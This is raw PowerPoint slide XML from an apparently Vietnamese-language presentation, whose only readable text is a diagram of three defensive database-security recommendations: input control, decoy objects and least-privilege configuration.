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62" r:id="rId2"/>
    <p:sldId id="273" r:id="rId3"/>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="284" r:id="rId6"/>
    <p:sldId id="286" r:id="rId7"/>
    <p:sldId id="287" r:id="rId8"/>
    <p:sldId id="288" r:id="rId9"/>
    <p:sldId id="289" r:id="rId10"/>
    <p:sldId id="290" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="292" r:id="rId13"/>
    <p:sldId id="293" r:id="rId14"/>
    <p:sldId id="294" r:id="rId15"/>
    <p:sldId id="285" r:id="rId16"/>
    <p:sldId id="295" r:id="rId17"/>
    <p:sldId id="296"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Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId25"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Sans Pro" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId26"/>
      <p:bold r:id="rId27"/>
      <p:italic r:id="rId28"/>
      <p:boldItalic r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswa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4341A-4EE2-4885-B17D-4086B769AF5B}">
  <a:tblStyle styleId="{9064341A-4EE2-4885-B17D-4086B769AF5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00"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570964-60C4-47B7-9735-E68B21DB7CD9}"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0A204EA2-D853-49D2-A675-B9CCC9D16031}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="150000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Thiết lập các đối tượng giả làm mồi nhử:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Phương pháp này nên phối hợp với việc đặt tên các đối tượng khó đoán. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CEB2296-FFD1-44B6-9872-4AB9C2B5602F}" type="parTrans" cxnId="{0AF86F1D-44C2-485A-B924-C9EF7334C2D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E2602E2-73FC-4516-8374-0FD4E332A70A}" type="sibTrans" cxnId="{0AF86F1D-44C2-485A-B924-C9EF7334C2D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A9AB952-D19A-4267-8CAA-F1DDBA09C9E2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="150000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Thiết lập cấu hình an toàn cho hệ quản trị cơ sở dữ liệu: Các ứng dụng thông thường nên tránh dùng đến các quyền như ‘dbo’ hay ‘sa’. Quyền càng bị hạn chế, thiệt hại càng ít. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA9894DE-8507-484C-B19D-EE023348BBCF}" type="parTrans" cxnId="{C8FDB60B-B149-4BB3-B4B5-F1CD79087D67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4717AE6-262C-443A-9253-BA7A7A2FA132}" type="sibTrans" cxnId="{C8FDB60B-B149-4BB3-B4B5-F1CD79087D67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F243878A-9AB2-47FB-BB07-EBF79DA5B3BA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="150000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Kiểm soát chặt chẽ dữ liệu đầu vào: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>C</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0"/>
            <a:t>ần có cơ chế kiểm soát chặt chẽ và giới hạn quyền xử lí dữ liệu đến tài khoản người dùng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E27A0ED-1C5F-45F9-8250-6950F897BD26}" type="sibTrans" cxnId="{C7DD5022-706C-441A-A3AF-0226701F012C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78A116AC-10FD-4D18-92FA-56C047E119DD}" type="parTrans" cxnId="{C7DD5022-706C-441A-A3AF-0226701F012C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBA7FF7B-DB95-4510-B4EA-EBD0C5E72FFF}" type="pres">
      <dgm:prSet presAssocID="{17570964-60C4-47B7-9735-E68B21DB7CD9}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85C32C20-1742-46A4-B54E-DE054579CF00}" type="pres">
      <dgm:prSet presAssocID="{17570964-60C4-47B7-9735-E68B21DB7CD9}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7313B545-E3AD-4588-BBE4-6FF6F97D802A}" type="pres">
      <dgm:prSet presAssocID="{17570964-60C4-47B7-9735-E68B21DB7CD9}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0D37264-52C5-4EFA-97E4-49D1A9F74AC5}" type="pres">
      <dgm:prSet presAssocID="{17570964-60C4-47B7-9735-E68B21DB7CD9}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35FCAF95-D941-4D35-B7AD-0ABDC27F30F2}" type="pres">
      <dgm:prSet presAssocID="{17570964-60C4-47B7-9735-E68B21DB7CD9}" presName="conn" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C7979F2-8BF2-4C72-ACDB-9AEA7FE2461B}" type="pres">
      <dgm:prSet presAssocID="{17570964-60C4-47B7-9735-E68B21DB7CD9}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3EF58E50-BE9E-4CFD-B673-B07BF2A1E62C}" type="pres">
      <dgm:prSet presAssocID="{17570964-60C4-47B7-9735-E68B21DB7CD9}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2810E903-1FF3-4DD0-BCAA-26A797191589}" type="pres">
      <dgm:prSet presAssocID="{F243878A-9AB2-47FB-BB07-EBF79DA5B3BA}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleY="116176">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFCCA6DB-1E09-43AD-89F0-9E14A67FC399}" type="pres">
      <dgm:prSet presAssocID="{F243878A-9AB2-47FB-BB07-EBF79DA5B3BA}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1899D597-E864-4122-B06B-1120CB3D60B3}" type="pres">
      <dgm:prSet presAssocID="{F243878A-9AB2-47FB-BB07-EBF79DA5B3BA}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C96543C4-2F2F-4E7C-8782-95410B8BF557}" type="pres">
      <dgm:prSet presAssocID="{0A204EA2-D853-49D2-A675-B9CCC9D16031}" presName="text_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleY="110084" custLinFactNeighborX="-73" custLinFactNeighborY="-7248">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6E964DA-4C11-4AD5-B62C-07186BB43326}" type="pres">
      <dgm:prSet presAssocID="{0A204EA2-D853-49D2-A675-B9CCC9D16031}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{037D652A-1AC7-4E16-9E13-2BE93D6BA56E}" type="pres">
      <dgm:prSet presAssocID="{0A204EA2-D853-49D2-A675-B9CCC9D16031}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{61BF9A70-44D8-4584-BA94-9B3D419BE91B}" type="pres">
      <dgm:prSet presAssocID="{8A9AB952-D19A-4267-8CAA-F1DDBA09C9E2}" presName="text_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleY="143628">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69774F32-9DEF-43B2-BB8C-62F859E4A6F4}" type="pres">
      <dgm:prSet presAssocID="{8A9AB952-D19A-4267-8CAA-F1DDBA09C9E2}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BC8AD1B-46A6-4343-8394-72B502BCE969}" type="pres">
      <dgm:prSet presAssocID="{8A9AB952-D19A-4267-8CAA-F1DDBA09C9E2}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C8FDB60B-B149-4BB3-B4B5-F1CD79087D67}" srcId="{17570964-60C4-47B7-9735-E68B21DB7CD9}" destId="{8A9AB952-D19A-4267-8CAA-F1DDBA09C9E2}" srcOrd="2" destOrd="0" parTransId="{DA9894DE-8507-484C-B19D-EE023348BBCF}" sibTransId="{F4717AE6-262C-443A-9253-BA7A7A2FA132}"/>
    <dgm:cxn modelId="{BC846472-2A57-42EB-853E-E55AFB580CC8}" type="presOf" srcId="{0A204EA2-D853-49D2-A675-B9CCC9D16031}" destId="{C96543C4-2F2F-4E7C-8782-95410B8BF557}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{0AF86F1D-44C2-485A-B924-C9EF7334C2D2}" srcId="{17570964-60C4-47B7-9735-E68B21DB7CD9}" destId="{0A204EA2-D853-49D2-A675-B9CCC9D16031}" srcOrd="1" destOrd="0" parTransId="{6CEB2296-FFD1-44B6-9872-4AB9C2B5602F}" sibTransId="{2E2602E2-73FC-4516-8374-0FD4E332A70A}"/>
    <dgm:cxn modelId="{618CE915-9215-4BE7-8192-D259976A9346}" type="presOf" srcId="{F243878A-9AB2-47FB-BB07-EBF79DA5B3BA}" destId="{2810E903-1FF3-4DD0-BCAA-26A797191589}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{59700443-50ED-4A41-AB9C-37637DAE27FC}" type="presOf" srcId="{1E27A0ED-1C5F-45F9-8250-6950F897BD26}" destId="{35FCAF95-D941-4D35-B7AD-0ABDC27F30F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C7DD5022-706C-441A-A3AF-0226701F012C}" srcId="{17570964-60C4-47B7-9735-E68B21DB7CD9}" destId="{F243878A-9AB2-47FB-BB07-EBF79DA5B3BA}" srcOrd="0" destOrd="0" parTransId="{78A116AC-10FD-4D18-92FA-56C047E119DD}" sibTransId="{1E27A0ED-1C5F-45F9-8250-6950F897BD26}"/>
    <dgm:cxn modelId="{E5478414-7D4D-4889-9A53-FC2947CAF642}" type="presOf" srcId="{17570964-60C4-47B7-9735-E68B21DB7CD9}" destId="{FBA7FF7B-DB95-4510-B4EA-EBD0C5E72FFF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{E1CBC179-6ECE-430F-BB75-B7460E9C2F1E}" type="presOf" srcId="{8A9AB952-D19A-4267-8CAA-F1DDBA09C9E2}" destId="{61BF9A70-44D8-4584-BA94-9B3D419BE91B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{7FF7CFBF-F3E7-4FC3-BCAF-7D5AF7B60131}" type="presParOf" srcId="{FBA7FF7B-DB95-4510-B4EA-EBD0C5E72FFF}" destId="{85C32C20-1742-46A4-B54E-DE054579CF00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{85FA2084-08F6-4C49-AE28-B28067F42390}" type="presParOf" srcId="{85C32C20-1742-46A4-B54E-DE054579CF00}" destId="{7313B545-E3AD-4588-BBE4-6FF6F97D802A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{174F271A-01DE-4B4C-9AFF-18646953097A}" type="presParOf" srcId="{7313B545-E3AD-4588-BBE4-6FF6F97D802A}" destId="{C0D37264-52C5-4EFA-97E4-49D1A9F74AC5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{F8CBB378-80B0-42CD-B628-FF6C8B0E62D8}" type="presParOf" srcId="{7313B545-E3AD-4588-BBE4-6FF6F97D802A}" destId="{35FCAF95-D941-4D35-B7AD-0ABDC27F30F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{DC7E0F8A-2E5A-4DE2-ACD0-AE5D16D9821B}" type="presParOf" srcId="{7313B545-E3AD-4588-BBE4-6FF6F97D802A}" destId="{5C7979F2-8BF2-4C72-ACDB-9AEA7FE2461B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{1691E852-ACBD-421A-B450-CA9C69E43BBC}" type="presParOf" srcId="{7313B545-E3AD-4588-BBE4-6FF6F97D802A}" destId="{3EF58E50-BE9E-4CFD-B673-B07BF2A1E62C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{66686FDE-63BD-4B01-B319-7ACE26266893}" type="presParOf" srcId="{85C32C20-1742-46A4-B54E-DE054579CF00}" destId="{2810E903-1FF3-4DD0-BCAA-26A797191589}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{2A45A9C7-7B39-40A6-958B-1F7D386DE2EF}" type="presParOf" srcId="{85C32C20-1742-46A4-B54E-DE054579CF00}" destId="{CFCCA6DB-1E09-43AD-89F0-9E14A67FC399}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{421C4219-DE07-4AD6-A9F1-80DCE5A5F463}" type="presParOf" srcId="{CFCCA6DB-1E09-43AD-89F0-9E14A67FC399}" destId="{1899D597-E864-4122-B06B-1120CB3D60B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{FCECEA8D-D32E-41F4-8234-85AA22FEAD4E}" type="presParOf" srcId="{85C32C20-1742-46A4-B54E-DE054579CF00}" destId="{C96543C4-2F2F-4E7C-8782-95410B8BF557}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{F90A0686-985C-4777-B6A7-AFAD5136BE47}" type="presParOf" srcId="{85C32C20-1742-46A4-B54E-DE054579CF00}" destId="{D6E964DA-4C11-4AD5-B62C-07186BB43326}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{6A00C19D-AA07-4496-9EC9-FCA745BADBA2}" type="presParOf" srcId="{D6E964DA-4C11-4AD5-B62C-07186BB43326}" destId="{037D652A-1AC7-4E16-9E13-2BE93D6BA56E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{25A0FA02-F295-4359-879A-4E6D9042A757}" type="presParOf" srcId="{85C32C20-1742-46A4-B54E-DE054579CF00}" destId="{61BF9A70-44D8-4584-BA94-9B3D419BE91B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{37ECC007-361A-4E92-AE0D-A264E4F408FC}" type="presParOf" srcId="{85C32C20-1742-46A4-B54E-DE054579CF00}" destId="{69774F32-9DEF-43B2-BB8C-62F859E4A6F4}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{A87F416E-812A-49BF-BAB1-DA716F37BEF2}" type="presParOf" srcId="{69774F32-9DEF-43B2-BB8C-62F859E4A6F4}" destId="{6BC8AD1B-46A6-4343-8394-72B502BCE96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CAF95-D941-4D35-B7AD-0ABDC27F30F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-3513820" y="-540141"/>
          <a:ext cx="4189242" cy="4189242"/>
        </a:xfrm>
        <a:prstGeom prst="blockArc">
          <a:avLst>
            <a:gd name="adj1" fmla="val 18900000"/>
            <a:gd name="adj2" fmla="val 2700000"/>
            <a:gd name="adj3" fmla="val 516"/>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10E903-1FF3-4DD0-BCAA-26A797191589}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="434324" y="260605"/>
          <a:ext cx="5866019" cy="722373"/>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547" tIns="35560" rIns="35560" bIns="35560" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="150000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Kiểm soát chặt chẽ dữ liệu đầu vào: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>C</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>ần có cơ chế kiểm soát chặt chẽ và giới hạn quyền xử lí dữ liệu đến tài khoản người dùng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="434324" y="260605"/>
        <a:ext cx="5866019" cy="722373"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1899D597-E864-4122-B06B-1120CB3D60B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="45704" y="233172"/>
          <a:ext cx="777240" cy="77724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6543C4-2F2F-4E7C-8782-95410B8BF557}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="656228" y="1167165"/>
          <a:ext cx="5639998" cy="684493"/>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547" tIns="35560" rIns="35560" bIns="35560" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="150000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Thiết lập các đối tượng giả làm mồi nhử:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Phương pháp này nên phối hợp với việc đặt tên các đối tượng khó đoán. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="656228" y="1167165"/>
        <a:ext cx="5639998" cy="684493"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{037D652A-1AC7-4E16-9E13-2BE93D6BA56E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="271725" y="1165860"/>
          <a:ext cx="777240" cy="77724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BF9A70-44D8-4584-BA94-9B3D419BE91B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="434324" y="2040634"/>
          <a:ext cx="5866019" cy="893067"/>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3547" tIns="35560" rIns="35560" bIns="35560" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="150000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Thiết lập cấu hình an toàn cho hệ quản trị cơ sở dữ liệu: Các ứng dụng thông thường nên tránh dùng đến các quyền như ‘dbo’ hay ‘sa’. Quyền càng bị hạn chế, thiệt hại càng ít. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="434324" y="2040634"/>
        <a:ext cx="5866019" cy="893067"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6BC8AD1B-46A6-4343-8394-72B502BCE969}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="45704" y="2098548"/>
          <a:ext cx="777240" cy="777240"/>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6200513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51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009658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6956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35753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80956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9652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51867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605745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40228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1" name="Shape 6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294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081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18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276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297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7517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76173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26053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550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9" name="Shape 159"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075850" y="1540175"/>
            <a:ext cx="6996600" cy="19220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0" name="Shape 160"/>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1" name="Shape 161"/>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2" name="Shape 162"/>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165" name="Shape 165"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9525" y="4462475"/>
            <a:ext cx="9167825" cy="595300"/>
            <a:chOff x="-9525" y="4462475"/>
            <a:chExt cx="9167825" cy="595300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="166" name="Shape 166"/>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167" name="Shape 167"/>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168" name="Shape 168"/>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169" name="Shape 169"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-42837" y="4443487"/>
            <a:ext cx="9229574" cy="642787"/>
            <a:chOff x="-42837" y="4443487"/>
            <a:chExt cx="9229574" cy="642787"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="170" name="Shape 170"/>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8" name="Shape 188"/>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0" name="Shape 190"/>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1" name="Shape 191"/>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2" name="Shape 192"/>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3" name="Shape 193"/>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95" name="Shape 195"/>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6" name="Shape 196"/>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7" name="Shape 197"/>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8" name="Shape 198"/>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047750" y="634125"/>
            <a:ext cx="6996600" cy="7158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8" name="Shape 288"/>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89" name="Shape 289"/>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0" name="Shape 290"/>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91" name="Shape 291"/>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2" name="Shape 292"/>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293" name="Shape 293"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9525" y="4462475"/>
            <a:ext cx="9167825" cy="595300"/>
            <a:chOff x="-9525" y="4462475"/>
            <a:chExt cx="9167825" cy="595300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="294" name="Shape 294"/>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295" name="Shape 295"/>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296" name="Shape 296"/>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297" name="Shape 297"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-42837" y="4443487"/>
            <a:ext cx="9229574" cy="642787"/>
